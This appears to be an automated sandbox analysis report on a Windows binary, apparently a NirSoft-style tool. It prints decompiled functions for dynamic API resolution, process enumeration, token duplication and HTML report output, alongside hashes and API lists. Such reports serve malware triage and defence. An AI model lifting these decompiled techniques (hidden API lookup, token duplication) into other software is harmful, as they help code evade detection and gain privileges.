                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                0x004090f5
                                                                                                                0x00409171
                                                                                                                0x00409171
                                                                                                                0x004090fd
                                                                                                                0x00409103
                                                                                                                0x00409107
                                                                                                                0x00409170
                                                                                                                0x00000000
                                                                                                                0x00409170
                                                                                                                0x00409116
                                                                                                                0x0040911a
                                                                                                                0x0040911f
                                                                                                                0x00409127
                                                                                                                0x0040912b
                                                                                                                0x00409130
                                                                                                                0x00409138
                                                                                                                0x0040913c
                                                                                                                0x00409141
                                                                                                                0x00409149
                                                                                                                0x0040914d
                                                                                                                0x00409152
                                                                                                                0x0040915a
                                                                                                                0x0040915e
                                                                                                                0x00409163
                                                                                                                0x00409165
                                                                                                                0x00409165
                                                                                                                0x00409163
                                                                                                                0x00409152
                                                                                                                0x00409141
                                                                                                                0x00409130
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                0x00409faf
                                                                                                                0x00409fb4
                                                                                                                0x00409fb5
                                                                                                                0x00409fb6
                                                                                                                0x0040a043
                                                                                                                0x0040a04a
                                                                                                                0x0040a058
                                                                                                                0x0040a05f
                                                                                                                0x0040a06d
                                                                                                                0x0040a074
                                                                                                                0x0040a08e
                                                                                                                0x0040a099
                                                                                                                0x0040a0ab
                                                                                                                0x0040a0c9
                                                                                                                0x0040a0ce
                                                                                                                0x00000000
                                                                                                                0x0040a0ce
                                                                                                                0x00409fc3
                                                                                                                0x00409fca
                                                                                                                0x00409fd8
                                                                                                                0x00409fdf
                                                                                                                0x00409ff9
                                                                                                                0x0040a006
                                                                                                                0x0040a018
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                0x00406216
                                                                                                                0x0040621b
                                                                                                                0x00406222
                                                                                                                0x0040625f
                                                                                                                0x00406263
                                                                                                                0x00406269
                                                                                                                0x00406271
                                                                                                                0x00406273
                                                                                                                0x00406289
                                                                                                                0x00406289
                                                                                                                0x0040628e
                                                                                                                0x0040628f
                                                                                                                0x004062a9
                                                                                                                0x004062ab
                                                                                                                0x004062ad
                                                                                                                0x004062b0
                                                                                                                0x004062c3
                                                                                                                0x004062c3
                                                                                                                0x004062d3
                                                                                                                0x004062da
                                                                                                                0x004062f1
                                                                                                                0x004062f7
                                                                                                                0x004062fe
                                                                                                                0x0040630d
                                                                                                                0x00406312
                                                                                                                0x0040631e
                                                                                                                0x00406327
                                                                                                                0x00406275
                                                                                                                0x00406283
                                                                                                                0x00406283
                                                                                                                0x00406285
                                                                                                                0x00406287
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406277
                                                                                                                0x0040627a
                                                                                                                0x00406280
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x0040627a
                                                                                                                0x00000000
                                                                                                                0x00406283
                                                                                                                0x00406273
                                                                                                                0x00406224
                                                                                                                0x00406224
                                                                                                                0x00406229
                                                                                                                0x0040622a
                                                                                                                0x0040622f
                                                                                                                0x00406236
                                                                                                                0x0040623c
                                                                                                                0x00406243
                                                                                                                0x00406245
                                                                                                                0x00406247
                                                                                                                0x00406248
                                                                                                                0x0040624b
                                                                                                                0x00406254
                                                                                                                0x00406254
                                                                                                                0x0040632d
                                                                                                                0x00406334

                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                0x004081e4
                                                                                                                0x004081ec
                                                                                                                0x004081fc
                                                                                                                0x00408200
                                                                                                                0x00408215
                                                                                                                0x0040821c
                                                                                                                0x0040822a
                                                                                                                0x00408231
                                                                                                                0x0040823f
                                                                                                                0x00408246
                                                                                                                0x0040824b
                                                                                                                0x0040824e
                                                                                                                0x0040825a
                                                                                                                0x0040825c
                                                                                                                0x00408261
                                                                                                                0x0040826c
                                                                                                                0x0040826d
                                                                                                                0x0040826e
                                                                                                                0x00408273
                                                                                                                0x00408273
                                                                                                                0x00408276
                                                                                                                0x0040827c
                                                                                                                0x0040828a
                                                                                                                0x00408290
                                                                                                                0x004082ab
                                                                                                                0x004082c5
                                                                                                                0x004082c6
                                                                                                                0x004082d1
                                                                                                                0x004082d2
                                                                                                                0x004082d3
                                                                                                                0x004082e7
                                                                                                                0x004082ec
                                                                                                                0x004082f0
                                                                                                                0x00000000
                                                                                                                0x004082f5
                                                                                                                0x004082fe

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                0x0040920a
                                                                                                                0x00409218
                                                                                                                0x00409223
                                                                                                                0x0040922c
                                                                                                                0x0040924b
                                                                                                                0x00409253
                                                                                                                0x0040929b
                                                                                                                0x004092e4
                                                                                                                0x0040929d
                                                                                                                0x004092a3
                                                                                                                0x004092b1
                                                                                                                0x004092bd
                                                                                                                0x004092cc
                                                                                                                0x004092d1
                                                                                                                0x004092d8
                                                                                                                0x004092dd
                                                                                                                0x00409255
                                                                                                                0x0040925b
                                                                                                                0x00409269
                                                                                                                0x00409275
                                                                                                                0x00409282
                                                                                                                0x0040928d
                                                                                                                0x00409292
                                                                                                                0x004092ec
                                                                                                                0x004092ef
                                                                                                                0x004092ef
                                                                                                                0x00409231
                                                                                                                0x00409232
                                                                                                                0x00409233
                                                                                                                0x00000000
                                                                                                                0x00409239
                                                                                                                0x0040921a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                0x00409c73
                                                                                                                0x00409c7c
                                                                                                                0x00409c90
                                                                                                                0x00409c9f
                                                                                                                0x00409ca2
                                                                                                                0x00409ca7
                                                                                                                0x00409ca9
                                                                                                                0x00409cb1
                                                                                                                0x00409cc0
                                                                                                                0x00409cc2
                                                                                                                0x00409cc7
                                                                                                                0x00409ccf
                                                                                                                0x00409cd0
                                                                                                                0x00409cd7
                                                                                                                0x00409cd8
                                                                                                                0x00409cd9
                                                                                                                0x00409cda
                                                                                                                0x00409cdc
                                                                                                                0x00409ce0
                                                                                                                0x00409ce1
                                                                                                                0x00409ce9
                                                                                                                0x00409cf1
                                                                                                                0x00409cfb
                                                                                                                0x00409d08
                                                                                                                0x00409d08
                                                                                                                0x00000000
                                                                                                                0x00409d0d
                                                                                                                0x00409d0f

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                0x004028a3
                                                                                                                0x004028ab
                                                                                                                0x004028bd
                                                                                                                0x004028ca
                                                                                                                0x004028d7
                                                                                                                0x004028e3
                                                                                                                0x004028e6
                                                                                                                0x004028e8
                                                                                                                0x00000000
                                                                                                                0x004028eb
                                                                                                                0x004028ec

                                                                                                                APIs
